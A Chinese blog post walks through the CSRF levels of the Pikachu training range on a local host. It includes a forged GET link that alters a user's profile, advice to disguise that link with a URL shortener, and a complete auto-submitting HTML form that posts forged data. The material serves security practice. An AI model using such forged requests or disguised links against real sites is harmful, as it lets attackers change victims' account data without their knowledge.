pikachu靶场 CSRF

已于 2022-10-03 11:58:51 修改
阅读量273 收藏 2
点赞数
分类专栏: 靶场 文章标签: 安全 前端 web安全 csrf
于 2022-10-01 15:19:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52746128/article/details/127134308
版权

目录

CSRF(get)

CSRF(post)

CSRF(get)

输入用户名lili,密码123456,进入后台后点击修改信息

开启抓包,提交修改后的信息,可以看到第一行里的数据,复制这部分数据,添加http://127.0.0.1,确保IP相同,然后更改其中数据,用短链接伪装一下(随便百度个短链接网站转换)

#原链接
http://127.0.0.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=18656565545&add=japan&email=lili%40pikachu.com&submit=submit

#短链接
https://s-3.cn/b12ha

在不需要重新登录的情况下成功修改信息

CSRF(post)

输入用户名lili,密码123456,进入后台后点击修改信息

开启抓包,提交修改后的信息,这次的信息不在url栏显示,意味着无法通过短链接的方式搞事情,需要制造一个网页用来提交表单信息

确认表单信息格式和抓包的内容一致,保存后把恶意网站放到原网页相同目录下,在退出修改页面前,打开新页面访问该恶意网站

http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/post114.html

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="11451419198" />
    <input id="add" type="text" name="add" value="japan-tokyo-xiabeize" />
    <input id="email" type="text" name="email" value="lili@163.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

可以看到页面在不用重新登录的情况下,直接提交了信息

CSRF Token的那关是示范关,加入了token值后无法通过构造恶意网站的形式来直接篡改信息,token的值每次修改都不一样;显而易见的,csrf成功攻击需要太多配合;前面图片水印不要介意,那是我打算分篇后从原草稿扣下来的,博客插入图片设置水印忘关了,电脑上的素材已经被我删了,所以只好带着水印用了,以后插入的图片不会带水印了

Al_1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pikachu漏洞靶场系列之CSRF
weixin_45868644的博客
09-11 1443
文章目录概述CSRF攻击需要条件CSRF和XSS的区别检测是否存在CSRF漏洞一、CSRF(get)二、CSRF(post)CSRF(token)防护措施 概述 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了、所以CSRF攻击也被称为“one click”攻击。 CSRF攻击需要条件 1、目标网站没有对修改个人信息修改的请
Web安全 CSRF漏洞的 测试和利用.(修改 管理员账号密码.)
网络安全领域___专研者.
02-18 4368
CSRF漏洞的 概括: CSRF(跨站请求伪造)漏洞的原理:攻击者是通过用户浏览了攻击者构造的链接,从而达成一个攻击的目的。主要的作用是:浏览器的安全策略是允许页面发送到任何地址的请求,攻击者可以控制页面的内容来控制浏览器 发送攻击者精心构造的请求.
pikachu靶场通关之csrf漏洞通关教程
最新发布
记录学习
05-14 621
pikachu靶场csrf通关教程
pikache靶场通关——CSRF攻击
p36273的博客
07-01 1469
靶场一共又三关,现在我们就来通关吧。
Pikachu(皮卡丘)靶场---CSRF
m0_74850066的博客
06-04 369
你可以这么来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
pikachu靶场通关之CSRF
qq_74825121的博客
01-20 1231
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。
pikachu靶场环境
02-12
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...
pikachu靶场搭建
02-27
pikachu靶场中,你会遇到各种Web安全漏洞,例如SQL注入、命令注入、跨站脚本(XSS)、跨站请求伪造(CSRF)、文件包含漏洞、权限绕过等。通过实践,你可以学习到如何利用这些漏洞,同时也能理解如何预防它们。例如...
pikachu + dvwa
09-22
Pikachu是一款针对初学者的安全训练平台,它模拟了一系列真实的网络攻防场景,涵盖了SQL注入、XSS攻击、CSRF(跨站请求伪造)等多种常见漏洞。通过实践操作,用户可以学习如何发现并修复这些安全问题,提升自身的...
pikachu(新手web安全入门靶场).7z
08-29
Pikachu靶场是一个专为初学者设计的Web安全学习环境,它提供了一系列精心构造的安全漏洞场景,让新手能够通过实战操作,理解和掌握Web应用安全的基本概念和技术。 一、Web安全基础 Web安全主要关注Web应用程序中...
pikachu-master.zip
07-05
1. **Web安全概念**:Pikachu靶场涵盖了多种常见的Web安全漏洞,如SQL注入、XSS跨站脚本、CSRF跨站请求伪造、文件包含、命令注入等,通过对这些靶场的实践,可以深入理解各类漏洞的原理及其防护措施。 2. **PHP编程...
[PiKaChu靶场通关]CSRF
网络安全知识分享
10-12 3959
[PiKaChu靶场通关]CSRF一、介绍二、攻击细节三、防御措施检查Referer字段添加校验token四、靶场内容CSRF(GET) 一、介绍 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网
Pikachu第三弹:CSRF
Pisces_mango的博客
09-03 394
一、CSRF(get) 1.登录,用户名:lili,密码:123456 修改个人信息时抓包,并发送到重发器中 2.修改个人信息并补全url头(http://192.168.8.1/)后复制网址,发给受害者点击 3.受害者在登录态点击url,信息修改成功 二、CSRF(post) 1.登录后,修改信息抓包并发送到重发器中 2.利用工具改包 3.生成url 4.复制url在浏览器打开(要开启BurpSuite代理) 5.点击按钮后,信息修改成功 三、C.
用户账号和组账号
weixin_56422027的博客
05-06 184
用户账号和组账号了解用户配置组件添加用户账号 了解 用户账号可以分为三种 超级用户:可以理解为拥有一个无限的管理权和普通用户;程序用户所没有的权限 普通用户:相当于超级用户的一个子集,可以拥有部分权限 程序用户:只拥有相应程序的相应程序权限 组账号可分为两种 基本组(又称为私有组) 附加组(又称为公共组) 用户配置组件 用户名:用户账号的名称。 加密口令:存放的是加密后的用户口令字串 最后一次修改时间:表示从某个时间起,到用户最近一次修改口令的间隔天数。 周期:表示修改密码的周期(天)。 最大时间间隔:表
Pikachu靶场——跨站请求伪造(CSRF)
来日可期的博客
10-07 1113
全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
pikachu靶场-csrf
mlws1900的博客
04-22 645
csrf(英语:Cross-site request forgery),也被称为或者,通常缩写为或者, 是一种挟制用户在当前已登录的Web上执行非本意的操作的攻击方法。跟(XSS)相比,利用的是用户对指定网站的信任,CSRF 利用的是对用户的信任。csrf与xss的区别如下xss:中文名称跨站脚本攻击,通常出现在搜索框、留言板、评论区等地方分类:反射性、存储型、DOM 型攻击方式:构造恶意链接,诱骗用户点击盗取用户的 cookie 信息。
Pikachu靶场-CSRF
qq_53083285的博客
11-04 326
Pikachu靶场-csrfCSRF漏洞概述CSRF漏洞测试流程CSRF演示CSRF token常见的防范措施 跨站请求伪造目录 CSRF漏洞概述 CSRF漏洞测试流程 CSRF演示 CSRF token 常见的防范措施
pikachu靶场-3 跨站请求伪造(CSRF
weixin_52180702的博客
12-12 628
这个get请求实际上是向后台传递了刚才的所有参数,而且我们并没有在这个提交的参数里看到csrf token,也就是说后台这里是没有做一些防CSRF的措施的,同时他又是通过get请求来提交的,如果有人相对它进行修改,他就只需要获取到这个链接,然后就可以对一些地方进行修改,然后通过邮件,聊天工具等发送给受害者,受害者点击后就会被修改信息。get型的CSRF是比较好利用的,我们只需要伪造这个链接,然后把我们想要修改的参数修改掉,然后发送给带登录态的攻击者,他只要点击,这个请求就完成了,这个攻击也完成了。
pikachu靶场csrf
09-03
Pikachu靶场是一个用于学习和测试网络安全漏洞的平台,其中包括了针对跨站请求伪造(CSRF)漏洞的攻击和防护内容。在这个平台上,你可以学习到CSRF攻击的原理、防护方法以及如何确认一个Web系统是否存在CSRF漏洞。引用 在Pikachu靶场中,CSRF攻击是通过构建恶意请求来利用用户的身份认证信息,窃取或者篡改用户的数据。攻击者通过在自己的网站上放置伪造的表单或者链接,引诱用户去点击,然后在用户不知情的情况下执行了恶意操作。为了防止这种攻击,可以使用一些防护措施,比如使用CSRF Token来验证请求的合法性。引用 在Pikachu靶场中,你可以通过完成一系列的关卡来学习CSRF漏洞的攻击和防护方法。这些关卡涵盖了CSRF攻击的不同类型,包括GET请求和POST请求等。此外,还介绍了CSRF Token的验证原理以及其他的防范措施。引用 所以,pikachu靶场提供了一个实践和学习CSRF漏洞的平台,通过完成相关关卡可以巩固对CSRF漏洞的学习和理解。引用<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Pikachu靶场CSRF漏洞详解](https://blog.csdn.net/m0_46467017/article/details/124795334)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值